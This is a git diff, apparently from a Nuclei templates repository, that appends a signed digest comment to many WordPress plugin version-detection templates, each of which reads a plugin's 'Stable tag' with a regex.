a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100c3e369e62871ce407cc435334f273f969a462f49419ac18b61575d02c7c147d10220126a688c4c7134940808087ab8c736cc2b7c15d8b78606b4a7d3eec511e1a67e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 4c6e616c1d..f80ad52d18 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402203ff2f94869e2d71404d7b6b21173f0101cdcacc7111ef071174839007389d4cb022051eb3bb546b1338c00e01fc72121a651f5290bf448f7186cf0d34459638dbb21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index a70a58690c..45f78a057d 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a004830460221008df933da120aa14f7f2997875c3f8311fa1d1cdb2f36d3cbff459d4bc70be6420221009b95191740be22b88a0af6fcec549ff73229b8229241248cd6a683af3bf3c00b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index f8691caf0a..d78f12f619 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022078de628675b3d1b0b81ddde48637dcb73b3e0ffa3ad495709e0236a6f377b3dc022100f0e3fa6027cefd8aa0d6467f0ba7f09a9be53ea954e80af9360d7aa5d321f9bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 0cd866179e..5262069bc6 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100d87c6f91e98a45badffe40c2c1155d0995ce10f05f32b11cd006f5c16188fe9b022100ade3383e727230301672bcc8c1ed3b6fe152e55694a472f1b90d2b099fbae87b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index b1d8479d13..93498ed542 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450220614a4876aeb38e01d612cfb074bc2b76b636b64e8f1f018b754732c100e44c5d022100918457c7b5acd6bf3ebec1cd75c6e61fed8670a247e37034a2099a51336deb3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 04e090313f..ce564ad6f4 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100f7991e6940015f1ce0a0f164b18e18ae44524268cbd3a915d0fb52d540537ef4022100ade5b29ed8f493e88b5aa65c4e3fe9654dd3f63cd5621b246c3a7970f5b4dffd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 57e618924b..69a0680e6b 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022056e11da41a5ff56e3bd28ab23fe565d7cc166c64b9b2c650a0b3b940146277db02203d8f73c2183a640b1dacac4299696ae4257ecda684f9f8b65d46661322bd1eb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 571b3b20a3..9f823a00de 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502202ac5cdb42700e002dfbb46acb1cb069d371cda8832424d50341d36517f2710c3022100ca2e00f38218c2d899b1d95fdeb9ff716139e79c80b74f1f5d9877b79943f5b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 4d562316b4..d9fa86a974 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a004830460221009b9244e3d27aedffcf7c2459be9da5c5717f5e5c13471950aa2ffc7041d4a1ef022100f079bd9e1bfd8d2c80e12f77bb520fcdb19186e79b481ffc81ce05914e287fa5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index dcea952545..7488cf89c2 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a004830460221009ce5b29724b7f3dd5319528ba4f3b6543d2485910a15230487367932de256c0d022100ea48848669ced43aadf8369e7c46120823cbcd5846b0109a196fa690852448aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 0ae2f18122..29d21a3fcb 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100dc8cf8e2d7a01b7bb4c8f95e571e356482d2176f00a3e5b68854e5a752d7de9c02207396b8b3f2d1db6ad31d91dabea5b54a02a483fb4b9c5493904cf5964ce647f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 12f549d536..8999581fed 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502203fb39f77d758d351b488c2c5e256fb3956f0f54d5e32caa6a2ba611b1a2c8132022100e8677cef31e6897f5ab1f09bff2e81ce908317e738bb63ce825defff58428634:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index d8ea6a72f1..d2d98fd77e 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022022c5428ae0b44092b739c352b5a649591d132dae8401a1c0240a78a68ca0260d02207ee45ca3dea66d8214d15a7271465b06ea1090752cee1ac96d6f2810505d00c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index e13909fff3..9f2d16f836 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402203a4efac0182651e475a0ab3689354c44a44b74352237c9fc65cb8f2079aa5d7602206d122564c45f87e24eb4d7f8f2233d7bea057be3f727aa9f7d68f5e4fa61d966:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 88fea67f93..a5f8e0438c 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100ebc8d5e4344e136e2ff395b94f904d9ac938747f72948e5a77c9358fcfdb77f5022100ba61d6d1932c6ed2d52f90d0632fdad3e68b486f344cfdd02b03666fe72e39a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index d205cdbf36..03fcfacc4d 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402204a811efe78a9728b957aea8d9f4272042f9176df724f62d2cd2cb5fad14bab6302204efa792bbacfdb8ee4faa53563284ad15e1d8e40d111f4d1a8cd9236263251a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 3fa20df7d2..b1cdb8cfb5 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a004830460221008d35cb1162fa1584ace20bb73798e2e16a215c4d9779c3841e6d621db2eba42e022100f939c3f91144b2197fa6155e661936b97a97c140c61b30c5f6f2c31d4e7a252c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index bcd63ced86..9946126575 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100c63f6c090926d207bb7f5acfaed59cd70113f84f14f418c3cb32a3aaf70716ca02202a790118a4180c5eb55ceb4ce9783d3ea5aae90774d857b0e09475a0985f0c87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index bca0326f2b..7d82f56a77 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100d50254a8dc64d990b1c9b1842ca1db21bd629ea02d4d9ad72491a07e04c8cdd2022100c34347ee7de71f7a9b92da80d9ecf435378ead1b49ffed917c852e850f368900:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 854328f04b..4c7f1bcf7e 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022050ed562350bca3f994c2bd4bdab500ac7ee2d214dabf743f0494eca28b54a794022100f78f8bc6960459fdf67eb0058a1e4d0575527d6ae8f7334d5d5943b9e98ba873:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 6d3f7f4566..8ecfff3b3a 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100965ea2acde1268781191f48a2bcfa231cfd8a18db51fc614a82e23cb2861747f022100a9bbf2d309257171df14170329f32809e5a15822ff2771fa3b1762ec71ddd6f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index dafbd25c9e..c27a3c3d51 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450221008b6a4ce67faeb5552cdfb6d03fcc37e58488977823894974277b56118c7310e402202438e0c292d867ee9eef3cc465302b6c5676001e0a78860576fe52626e1ff0aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index f10480fc8f..0dde76be4e 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022038f557eb75121bf0c2ca336abbfab0dd86c2d883489e6118d5d307532facaaef022100e0549342258f7fa97c4a8f7562bcfc3585c6f0f0a70e87afb413c4715e5b085e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 6c92091767..3f56db3880 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100b7e836acbb8db25af1c3557576a1bd1948934c3fd5a9bcaf03ce054a10b20ebe022100fb3c782f00ce58d4afb60d21d4c1d1bd4c0827a31751929c0ae7188306121501:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index b25c6c9a9c..4ffd28a42a 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a004630440220159e80cd03382f05cd9a817978f3e89a0b33e8dbde1a1eda693e37a4716e4ae6022078fc99c4cdbc0ef203eaba5ec96b2faee1b3953de6d043122acd5c9380856256:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 1781172d05..0b9d0ca699 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502202f537fe6ff622204473f3a4cadc664f90c0835b6202631ca1b7f7ac49c5d4485022100bcd4a1573d75458b3d2dacdb10abb7fa13c2c2ccc6d2a95b0fc7667e1e05350f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 92c8ce3409..3cb8e2d512 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402201faf5b335711fa7e469870f640de1a464d631ee2e5f3b9051f8ff6d12c3130be02202b6d9480469cc2d06bb262b2886c4bd1e6625dd4a1cb9360787f83a37d58c16a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index eea42ed8da..ccd00717f0 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100ec5ef3a82b7db6fe1995d3e6bae1899a023da98c5b9ea882d404e8ce8aeed33002203737c877f167d0a45351715d7025fa71e41643db618c8840de3faf8cae7c41de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index bedb85a0eb..5ab20b1477 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502204b6012f6b8bfa1c6a99c248010c43eac83bd155b5bd3895b5efd30940ef525ae022100b4cd1307908cebf3584ddc84cb9192cf069f3065834f94f14d8fcbb9fc9dc8a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 45bbbc71df..ed9676d822 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502205a2755903f8c81eb962f6dac8945d2c10f4f307008ea312b21673d2c794fa3a4022100e9b4c9e2b36b386e671e8d97a3a27e45cb32dd84f790c9e3ce0591f45202c2fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 03befac73e..8917076568 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450220320a03863c194e469534f61be9f85a1c5a69f8d703950b5c14ef4e64fbe1f9ef022100c4338ea6f70144ebdeec7a3e69c7bbef1019df6b52ef1b21ecd9f3a2d19215ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index fe4c223cba..dc2d740f00 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100e34245f480b6036ac5772493ffd112627c2e95802587ade2a6f295960a16ee1b022100d2016515fef570512d2292119e43937a4e38c01a708340c70eb220e8f53eec55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 0db316d66d..5ecf0d8720 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a004630440220583fe0572fd2e668d74c4833027cc715c344ab4e9b5e722d366d59c8b8e63d5202201c415e1cb3b104dffb603a65e45672e5ef7b54bd23dd89aa36b9dbcad5a1d4ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 135639253d..ef1c8cbe89 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100a590b5c442250a0898978b03480ad6dd24de0ebef980141e072c9271a96ce65c022016a8a97be537df76bc02b5d260d1bf2355f4511802aba5633874f0a90fafb99d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 540fbaf9ac..2fe69b6c76 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450220106be2a9d1cb98939f2e5d2e982f14fc1bfd3f0f64dda79bd60df80eb1aa3dbd022100ab6238b48740ce3628ad00a5dfc39a981712ff4917a3689ca2ea4bc4d771dd17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 7e71b4736f..5978e969cb 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100a4562ab7f0bfbbfc65f3eedd4d90d1f069ab8bc7e301859fc0ef2c0ce18baa36022100b179573564f0bc20b7e43b3240d550818778082d06a209015da0932da86a5c33:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 5ea77f898d..f611324c95 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502201d39fa069c2cff4ae6e5b68c38247e317fbb47be0646a4e2c3ec52efc7dcac5c02210097de9432d77f4d030ba80cc7c00b99eeb3206b56548d885df18438af00ff0292:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index fc498e67e6..c1a0de3707 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450220488f351ebfc7f8f1a990b4bc54c4980fbe7ac353fe6cd92dacb65e3d5929072e022100ad8f887bc87c4bc7fd892bc39df1edd2dde5ef989aeba46c6959afbeb640c30a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/extendify.yaml b/http/technologies/wordpress/plugins/extendify.yaml index 554a7ddc52..0daa4bbef5 100644 --- a/http/technologies/wordpress/plugins/extendify.yaml +++ b/http/technologies/wordpress/plugins/extendify.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100d370a8f0fdf4f76c4ba6fad037d330441c38b352144cafc7956631e189402b7b02205550b3e2753b119a3efad82483d66954fc2b66728de5e973702f81152eb7f58c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 465aa93d57..6bf8e50eab 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450220442ed3cd96ab917942c18635589c279f57bfe103d45965fc303a1e760ea30b0b022100bad8e0c1c9b22e404b36922caede2798eb88a94ec681076f98e51102179a82bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a1b0e57a9..b58c923a0b 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022055eca80547a7fe3b559e3886f78dc0e76a394198dfc882d2dbdb9dca53c13b82022048ac37e76722b30e4d8d3f57dd2905b135f80e1becf91319a1d19561c208e4db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 033cc4bc3d..00ee93f86b 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450221008bced3cecb75db02f91757777395dc44d92fadfb99f036564379caee778a40080220766c0845505ed3f8debe1809838d1294dbf974103177d8893cbdc8f1b90438f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluent-smtp.yaml b/http/technologies/wordpress/plugins/fluent-smtp.yaml index 4a3dcbd210..b8a4aef80e 100644 --- a/http/technologies/wordpress/plugins/fluent-smtp.yaml +++ b/http/technologies/wordpress/plugins/fluent-smtp.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022045c2a340d45e24a73c8ae3c102496fc0b96dba6624642337eadb1528e14c884b02200aac4bf8aee66abb3d4a6ca99aa0a8aa465dbb60ed84f31d61081fb54e8cf1d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 945ab6ad03..f731a9a2c2 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502200cc7e32b66ca395f2c4da610e685a7b35dcb7886476425b6011e8a76832b5216022100e0aa841193287673f63d77c0d6e94301c92085b03fc4bea0838cf5fb9efd101f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 2072b51ab9..a428558431 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100f9c0566ba3e482c7306ca9545869f4e8bd7a69654e3b8f092978af820934e87c0221008bb82252c79960775efbc92f52e8220e31cd9ea22ae906c4e21828f3a176ccef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index b509d8cc67..405f3de4b0 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450220700c04a39cdcc7f87f765d77db838d921fdfaf5e61bf8bfc858e0effcb48886c022100aabdf6d2a996983525e33800d36237e6432b92f663efcfce150300fddf0bbbf9:922c64590222798bb761d5b6d8e72950 \ No 